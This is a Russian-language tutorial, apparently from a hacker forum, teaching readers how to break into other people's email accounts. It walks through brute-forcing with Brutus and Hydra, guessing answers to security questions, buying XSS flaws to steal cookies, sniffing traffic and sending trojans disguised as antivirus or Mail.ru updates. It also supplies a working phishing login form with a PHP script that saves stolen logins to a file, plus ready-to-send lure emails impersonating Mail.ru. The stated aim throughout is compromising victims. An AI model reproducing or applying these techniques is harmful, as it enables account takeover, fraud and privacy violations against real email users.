На эту тему написанно огромное количество статей. Взлом e-mail всегда
был и будет актуальной темой. В данной статье я хочу рассмотреть некоторые
способы взлома e-mail, некоторые из них лутше, некоторые хуже, но каждый
имеет право на жизнь.
Брут - BruteForce
Брут(от анг. Brute force - грубая сила) - это один из старейших способов взлома,
не только e-mail, но и многих других систем(ftp, telnet…)
Брут, проще говоря - это подбор пароля. Существуют специальные программы,
которые делают это автоматически. Вам надо лишь составить хороший словарь, и
скормить его программе, которая в свою очередь будет по одному перебирать этим
пароли, и если какой-либо из них подойдет, то она известит вас об этом.
Самые популярные программы для брута - это Brutus и Hydra(сслыки в конце статьи).
Brutus - простая в обращении программа, способная подбирать пароли к различным
сервисам(ftp, telnet, pop, form).
Hydra - аналог Brutusa, но более эффективная.
Я не буду описывать как пользоватся этими программами, так как в них нет ничего
сложного. В крайнем случае вы всегда можете задать вопрос на нашем форуме, там
вам всегда помогут.
С помощью брута взламывать очень сложно, так как не факт что в словаре окажется
нужный пароль, да и перебор всех паролей может занять приличное время.
Подбор ответа на "секретный вопрос"
Этот способ порой бывает очень хорош. Часто люди ставят в качестве секретного
вопроса - "Где я живу?" или "Какое ваше любимое блюдо?".
Узнать где живет человек порой не сложно - вбейте его email в поиск на Yandex и
если вам повезет, то вы найдете сайты где он любит бывать(форумы, чаты), и
возможно там будет ответ.
На вопрос "Какое ваше любимое блюдо?" - очень часто отвечают "шашлык", либо
"картошка".
Так же порой ответом на вопрос могут быть фразы - "А тебе зачем?", "Спроси меня",
"Непомню", "Незнаю" и тому подобные.
Так что тут все зависит от вашей смекалки.
XSS
Этот способ очень часто применяют при взломе email.
XSS - это межсайтовый скриптинг. Эта уязвимость дает вам мозможность выполнять
javascript код в броузере жертвы. Тем самым позволяя украсть cookie или
сессию.
Использовать данные способ не просто, для этого требуются некоторые навыки. Но
нет ничего не возможно.
Для взлома e-mail вам потребуется найти XSS уязвимость на том сайте, где
находится e-mail вашей жертвы. Сделать это не просто, и порой даже не
возможно, но попытатся стоит.
Так же вы можете найти либо купить такую уязвимость на различных форумах.
Люди часто продают XSS на mail.ru и XSS на yandex.ru.
Снифер
Если вы находится с жертвой в одной сети, то есть шанс, что вы сможете
перехватить логин и пароль с помощью сниферов. Снифер - это программа для
перехвата сетевого трафика. Существует огромное количество сниферов специально
заточеных под отлов паролей от e-mail. На сайте
www.seclab.ru вы можете скачать
такие программмы.
Троян
Если ни один из способов вам не подошел, либо у вас не получилось его реализовать,
то можно попробовать послать жертве - троян. Троян - это программа
которая ворует пароли, и пересывает их вам(хотя трояны бывают разные, и воруют
не только пароли от e-mail). Чтобы жертва скачала и запустила ваш файл - вам
надо написать какое-нибудь правдоподобное письмо. Например - что это обновления
для антивируса, или новая версия Mail.Ru Agent. Тут все зависит от вашей
фантазии.
Фишинг
Фишинг - это один из старейших способов обмана юзеров.
Суть его заключается в том, что вы создаете страницу "двойник". Вы просто
копируете исходный текст страницы, и вывешиваете ее на бесплатном, либо платном
хостинге.
Обычно копируют страницу входа - там где юзеру надо будет ввести пароль.
Когда юзер введет свои логин и пароль, то скрипт на вашей странице запишет их в
файл, либо отправит вам на почту.
Например:
У нас на странице есть форма для ввода логина и пароля. Будем исходить из того,
то на том хостинге где вы разместили страницу - есть поддержка PHP.
Если наша форма выглядит следующим образом:
<&form action="enter.php" method=POST>
Логин: <&input type="text" name="login" size=30><&br>
Пароль: <&input type="password" name="pass" size=30><&br>
<&input type=submit value="Войти">
<&/form>
Я не буду подробо рассматривать каждую строчку, так как в цели данной статьи не
входит изучение HTML, если вам что-то не понятно, то скачайте учебник по HTML и
попробуйте разобратся.
Итак, наша форма имеет два поля ввода: login и pass. При нажатии на кнопку
"Войти", данные из этих полей будут переданы скрипту enter.php методом POST.
Скрипт enter.php может быть примерно следующего содержания:
$log = $_POST["login"];
$pas = $_POST["pass"];
if($log == "" && $pas == "") { echo "Please fill login&password fields";exit;}
$file = "mails.txt";
$f p = fopen($file, "w+");
fwrite($fp, "$log:$pasrn");
fclose($fp);
echo "";
?>
Принцип его прост - скрипт получает логин и пароль введеные пользователем, и
если они не пусты, то записывает их в файл, и затем перенаправляет юзера на
реальную страницу.
Теперь придумываем текст письма, и заставляем юзера зайти на вашу страницу.
Поздравляем - Вам открытка
Это одна из возможностей использования предыдущего способа.
Очень часто система @Mail.ru рассылает открытки, поздравляя с праздниками и
днями рождения.
Вы составляете письмо якобы от @Mail.ru, и отсылаете его юзеру. Конечно письмо
должно быть отправленно в том же виде как его рассылает @Mail.ru, так же
желательно чтоб обратный адрес был такой же как от @Mail.ru.(как отправлять
письма от чужого имени - вы сможете прочитать следующих статьях)
Когда все готово - отсылаем письмо юзеру, и ждем пока он зайдет на вашу страницу.
Этот метод наиболее дейтсвенный на данный момент.
Лох - это судьба?
Очень давно - году этак в 2001, я в первые увидел этот способ.
В то время это был популярный способ достать пароли от мыльников.
Суть заключается в следующем:
На различные форумы рассылаются сообщения подобного рода:
"Привет!
Я недавно узнал что у почтовой системы Mail.Ru есть огромный баг! Все дело в
том, что у них есть сервис Восстановление Пароля, так вот, обработкой запросов
занимается робот!! Который сидит на адресе
password_robot@mail.ru
Если отправить специальное письмо на этот адрес, то вам прийдет пароль от
нужного ящика!!
Письмо надо отправлять такое:
Тема письма - ?password!(#newpassword#)!edit
Кому -
password_robot@mail.ru
Тело письма:
First - тут E-mail от которого требуется восстановить пароль
Pass - тут любое слово
Recover_new_password_for:тут ваш E-Mail
Pass_For_Recover:тут ваш пароль
Do_Now_Sig:0x00100111
Отправив такое письмо, к вам прийдет пароль!!!"
Естесственно никакого робота нету, а E-Mail
password_robot@mail.ru принадлежит
автору этого сообщения и ваш пароль уйдет к нему.
В настоящие время этот способ уже не актуален, так как каждый 2-й знает про
него. Но до сих пор попадаются индивидумы, которые пытаются развести людей
подобным образом.
Социальная Иженерия
Для реализации этого способа, вам необходимо обладать навыками Соцаильной
Инженерии(основы которой вы можете почерпнуть из статей на нашем сайте)
Самый простой пример Социальной Инженерии для доставания пароля от E-Mail
- это отправить юзеру письмо следующего содержания:
Дорогой пользователь!
Мы вынужденны довести до вашего сведения, что ваш почтовый ящик в скором времени
может быть закрыт, из-за недостаточной активности на нем.
Чтобы этого не произошло - вам необходимо заполнить нижепреведенную форму, и
переслать ее нам.
Форма:
Имя - ваше имя
Фамилия - ваша фамилия
Город - город вашего проживания
Страна - страна вашего проживания
Логин для входа в систему - впишите тут ваш логин(то что идет до @)
Пароль - впишите тут ваш пароль
Если вы не заполните данную форму, и не перешлете ее нам в течении 3-х дней, то
мы вынужденны будем закрыть ваш почтой адрес.
